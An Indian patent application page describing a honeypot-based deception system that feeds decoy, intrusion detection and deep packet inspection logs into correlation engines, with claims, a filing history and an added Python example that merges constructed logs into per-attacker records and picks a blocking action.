[0059] Fig. 5 illustrates a schematic block diagram depicting a method 500 for implementing a threat intelligence service using deception for preventing a cyber-attack on a network, in accordance with an embodiment of the present subject matter.
[0060] At block 502, the method 500 includes detecting, by a honeypot engine, at least one activity by an attacker, wherein the honeypot engine emulates a vulnerable service to lure the attacker.
[0061] At block 504, the method 500 includes capturing, by the honeypot engine, data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log.
[0062] At block 506, the method 500 includes detecting, by an intrusion detection engine, an attack on the network by processing the network event log and generating a network activity log upon detecting the attack.
[0063] At block 508, the method 500 includes analyzing, by a Deep Packet Inspection (DPI) engine, a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis.
[0064] At block 510, the method 500 includes processing, by a log consolidation and correlation engine, the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker.
[0065] At block 512, the method 500 includes analyzing, by a log aggregation engine, the cumulative attack log and determining an action for preventing the detected cyber-attack on the network, wherein the system is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.
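Blocks 510 and 512 of method 500 consolidate three inputs (the decoy sensors' network event log, the intrusion detection engine's network activity log and the DPI engine's detailed data) into cumulative attack records and derive an action from each. The following is an added example of that consolidation and is not the applicant's code. It applies the temporal, statistical and spatial filters that claim 2 names, and the exploration-versus-targeted profiling that [0058] describes, using assumed field names, thresholds and policy; every log line is constructed for the example and the addresses are TEST-NET documentation addresses.

```python
"""Consolidating decoy, IDS and DPI logs into cumulative attack records.

Added example of blocks 510 and 512 of method 500; not the applicant's code.
All log lines are constructed; field names, thresholds and the action policy
are assumptions for the illustration.
"""
import json
from collections import Counter
from dataclasses import dataclass, field

# Constructed network event log from the decoy sensors (block 504), one JSON object per line.
HONEYPOT_EVENTS = """
{"ts": 1700000000, "sensor": "decoy-1", "service": "ssh", "src": "198.51.100.23", "event": "login_attempt"}
{"ts": 1700000012, "sensor": "decoy-1", "service": "ssh", "src": "198.51.100.23", "event": "login_attempt"}
{"ts": 1700000040, "sensor": "decoy-2", "service": "telnet", "src": "198.51.100.23", "event": "connect"}
{"ts": 1700000065, "sensor": "decoy-3", "service": "http", "src": "198.51.100.23", "event": "request"}
{"ts": 1700000300, "sensor": "decoy-1", "service": "ssh", "src": "203.0.113.5", "event": "login_attempt"}
{"ts": 1700003000, "sensor": "decoy-1", "service": "ssh", "src": "203.0.113.5", "event": "login_attempt"}
""".strip()

# Constructed network activity log from the intrusion detection engine (block 506).
IDS_ALERTS = """
{"ts": 1700000011, "src": "198.51.100.23", "sig": "SSH brute-force pattern"}
{"ts": 1700000041, "src": "198.51.100.23", "sig": "Telnet default-credential probe"}
""".strip()

# Constructed detailed data from the DPI engine (block 508).
DPI_RECORDS = """
{"ts": 1700000065, "src": "198.51.100.23", "dst_port": 80, "verdict": "malicious"}
{"ts": 1700000300, "src": "203.0.113.5", "dst_port": 22, "verdict": "benign"}
""".strip()


@dataclass
class CumulativeAttack:
    """One attacker's activity within a single time window, with the correlated characteristics."""
    attacker: str
    first_seen: int
    last_seen: int
    events: int = 0
    sensors: set = field(default_factory=set)
    services: set = field(default_factory=set)
    ids_signatures: set = field(default_factory=set)
    dpi_verdicts: Counter = field(default_factory=Counter)

    @property
    def profile(self) -> str:
        # Assumed heuristic for [0058]: several distinct services in one window reads as
        # exploration of the environment; one or two reads as targeting a specific service.
        return "generic exploration" if len(self.services) >= 3 else "targeted"


def _parse(lines: str) -> list:
    return [json.loads(line) for line in lines.splitlines() if line.strip()]


def correlate(honeypot_log, ids_log, dpi_log, window=600, min_events=2, min_sensors=1):
    """Block 510: merge the three logs into cumulative attack records, then filter them."""
    events = sorted(_parse(honeypot_log), key=lambda e: (e["src"], e["ts"]))
    alerts, dpi = _parse(ids_log), _parse(dpi_log)

    records, current = [], None
    for e in events:
        # Temporal filter: a new record starts when the attacker changes or the
        # gap since the previous event exceeds the window (seconds).
        if current is None or e["src"] != current.attacker or e["ts"] - current.last_seen > window:
            current = CumulativeAttack(e["src"], e["ts"], e["ts"])
            records.append(current)
        current.last_seen = e["ts"]
        current.events += 1
        current.sensors.add(e["sensor"])
        current.services.add(e["service"])

    # Attach IDS alerts and DPI verdicts from the same source inside the record's window.
    for r in records:
        for a in alerts:
            if a["src"] == r.attacker and r.first_seen <= a["ts"] <= r.last_seen:
                r.ids_signatures.add(a["sig"])
        for d in dpi:
            if d["src"] == r.attacker and r.first_seen <= d["ts"] <= r.last_seen:
                r.dpi_verdicts[d["verdict"]] += 1

    # Statistical filter (minimum event count) and spatial filter (minimum distinct sensors).
    return [r for r in records if r.events >= min_events and len(r.sensors) >= min_sensors]


def service_statistics(records) -> Counter:
    """Per-service count of attack records that touched it; the statistical input to the feedback step in [0056]."""
    stats = Counter()
    for r in records:
        stats.update(r.services)
    return stats


def determine_action(record: CumulativeAttack) -> dict:
    """Block 512: derive a preventive action from one record (assumed policy)."""
    confirmed = bool(record.ids_signatures) or record.dpi_verdicts["malicious"] > 0
    return {
        "block_source": confirmed,
        "reset_decoys": sorted(record.sensors) if confirmed else [],  # cf. the auto-reset in claim 4
        "attacker_profile": record.profile,
    }


if __name__ == "__main__":
    for rec in correlate(HONEYPOT_EVENTS, IDS_ALERTS, DPI_RECORDS):
        print(rec.attacker, rec.events, sorted(rec.services), rec.profile, determine_action(rec))
```

With the constructed input, the two isolated attempts from 203.0.113.5 fall outside one window and are dropped by the statistical filter, while the four events from 198.51.100.23 across three sensors collapse into a single record that carries both IDS signatures and the DPI verdict; that record is what block 512 acts on.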
[0066] While the detailed description describes various embodiments of the invention, other and further embodiments of the invention may be devised without departing from the basic scope thereof. The scope of the invention is determined by the claims that follow. The invention is not limited to the described embodiments, versions, or examples, which are included to enable a person having ordinary skill in the art to make and use the invention when combined with information and knowledge available to the person having ordinary skill in the art.
Claims:
We claim:
1. A system (102) implementing a threat intelligence service using deception for preventing a cyberattack on a network, the system (102) comprising:
one or more decoy sensors amongst a plurality of decoy sensors (208) comprising:

a honeypot engine (212) configured to:

detect at least one activity by an attacker, wherein the honeypot engine (212) emulates a vulnerable service to lure the attacker; and
capture data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log;
an intrusion detection engine (214) configured to detect an attack on the network by processing the network event log and generating a network activity log upon detecting the attack;
a Deep Packet Inspection (DPI) engine (216) configured to analyse a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis;
a log consolidation and correlation engine (218) configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker; and
a data collector engine (210) comprising:
a log aggregation engine (220) configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network, wherein the system (102) is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.
2. The system (102) as claimed in claim 1, wherein analyzing the cumulative attack logs comprises:
aggregating, by the log aggregation engine (220), the plurality of network event and the plurality of cumulative attack event and attack activity behavior logs for generating cumulative attack logs;
extracting, by the log aggregation engine (220), a plurality of relevant features present in the logs required for a plurality of analyses on the network event and the attack;
generating, by the log aggregation engine (220), a plurality of augmented logs by generating behavior logs from the plurality of deception services;
analyzing, by the log aggregation engine (220), the plurality of cumulative attack and attack activity behavior logs using a statistical filter, a temporal filter, and a spatial data filter; and
performing, by the log aggregation engine (220), a correlational and a statistical analysis of the attacks recorded on a plurality of the decoy sensors and extracting the network event and attack activity behavior logs.
3. The system (102) as claimed in claim 1, further comprising:
processing, by a Dynamic Intelligent Shifting Sensor (DISS) engine (226), data associated with the plurality of decoy sensors (208) and the network being monitored by the plurality of sensors, wherein the DISS engine (226) prevents an attacker from determining whether a decoy sensor of the plurality of decoy sensors (208) is a honeypot or a production sensor; and
updating and reconfiguring, by the DISS engine (226), the decoy services based on a plurality of external inputs comprising the frequency, tactics and techniques of the attacks on the deception services, to adapt to a specific threat landscape of a target environment.
4. The system (102) as claimed in claim 1, wherein a decoy sensor deployed is a part of a honeynet that auto resets after a specific period and based on the processed data, the decoy sensor is selected from the plurality of decoy sensors (208) for a next reset.
5. The system (102) as claimed in claim 3, wherein the deception service is isolated by executing the deception service in one or more isolated containers deployed on a virtual machine, wherein the one or more isolated containers run in an isolated environment independent of one another.
6. The system (102) as claimed in claim 1, further comprising:
a monitoring engine (222) that suggests new deception services for enhanced security deployment, configured to:
monitor the deception service deployed in an environment;

generate statistical data associated with the deception service based on monitoring the decoy service;
determine another deception service to be deployed in future in the environment based on the statistical data; and
recommend the other deception service to a deploying engine as feedback, wherein the deploying engine is configured to deploy decoy services in the environment.
7. The system (102) as claimed in claim 1, wherein analyzing a network traffic associated with the network comprises:
extracting, by the DPI engine (216), each attribute associated with each header component and each payload component of one or more network packets associated with the network traffic;
comparing, by the DPI engine (216), one or more characteristics of each attribute associated with one or more network packets and correlating the one or more characteristics with other logs generated by the monitoring services that provide specific threat intelligence information; and
determining, by the DPI engine (216), that each of the attributes is one of a malicious attribute or a benign attribute based on the comparison.
8. The system (102) as claimed in claim 1, wherein the deception service deployed in an environment is cleaned up and rebuilt after a predetermined period of time.
9. The system (102) as claimed in claim 1, wherein the system (102) deployed to emulate the vulnerable service is scalable.
10. A method (500) implementing a threat intelligence service using deception for preventing a cyberattack on a network, the method (500) comprising:
detecting, by a honeypot engine (212), at least one activity by an attacker, wherein the honeypot engine (212) emulates a vulnerable service to lure the attacker;
capturing, by the honeypot engine (212), data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log;
detecting, by an intrusion detection engine (214), an attack on the network by processing the network event log and generating a network activity log upon detecting the attack;
analyzing, by a Deep Packet Inspection (DPI) engine (216), a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis;
processing, by a log consolidation and correlation engine (218), the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker; and
analyzing, by a log aggregation engine (220), the cumulative attack log and determining an action for preventing the detected cyber-attack on the network, wherein the system (102) is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.

Documents

Application Documents

# Name Date
1 202411012747-STATEMENT OF UNDERTAKING (FORM 3) [22-02-2024(online)].pdf 2024-02-22
2 202411012747-FORM-9 [22-02-2024(online)].pdf 2024-02-22
3 202411012747-FORM FOR STARTUP [22-02-2024(online)].pdf 2024-02-22
4 202411012747-FORM FOR SMALL ENTITY(FORM-28) [22-02-2024(online)].pdf 2024-02-22
5 202411012747-FORM 1 [22-02-2024(online)].pdf 2024-02-22
6 202411012747-FIGURE OF ABSTRACT [22-02-2024(online)].pdf 2024-02-22
7 202411012747-EVIDENCE FOR REGISTRATION UNDER SSI(FORM-28) [22-02-2024(online)].pdf 2024-02-22
8 202411012747-EVIDENCE FOR REGISTRATION UNDER SSI [22-02-2024(online)].pdf 2024-02-22
9 202411012747-DRAWINGS [22-02-2024(online)].pdf 2024-02-22
10 202411012747-DECLARATION OF INVENTORSHIP (FORM 5) [22-02-2024(online)].pdf 2024-02-22
11 202411012747-COMPLETE SPECIFICATION [22-02-2024(online)].pdf 2024-02-22
12 202411012747-STARTUP [23-02-2024(online)].pdf 2024-02-23
13 202411012747-FORM28 [23-02-2024(online)].pdf 2024-02-23
14 202411012747-FORM 18A [23-02-2024(online)].pdf 2024-02-23
15 202411012747-Proof of Right [15-03-2024(online)].pdf 2024-03-15
16 202411012747-FORM-26 [15-03-2024(online)].pdf 2024-03-15
17 202411012747-FER.pdf 2024-04-16
18 202411012747-FORM 3 [16-07-2024(online)].pdf 2024-07-16
19 202411012747-FER_SER_REPLY [19-08-2024(online)].pdf 2024-08-19
20 202411012747-CLAIMS [19-08-2024(online)].pdf 2024-08-19
21 202411012747-US(14)-HearingNotice-(HearingDate-04-04-2025).pdf 2025-02-25
22 202411012747-FORM-26 [29-03-2025(online)].pdf 2025-03-29
23 202411012747-Correspondence to notify the Controller [29-03-2025(online)].pdf 2025-03-29
24 202411012747-Written submissions and relevant documents [19-04-2025(online)].pdf 2025-04-19

Search Strategy

1 SearchHistoryE_12-03-2024.pdf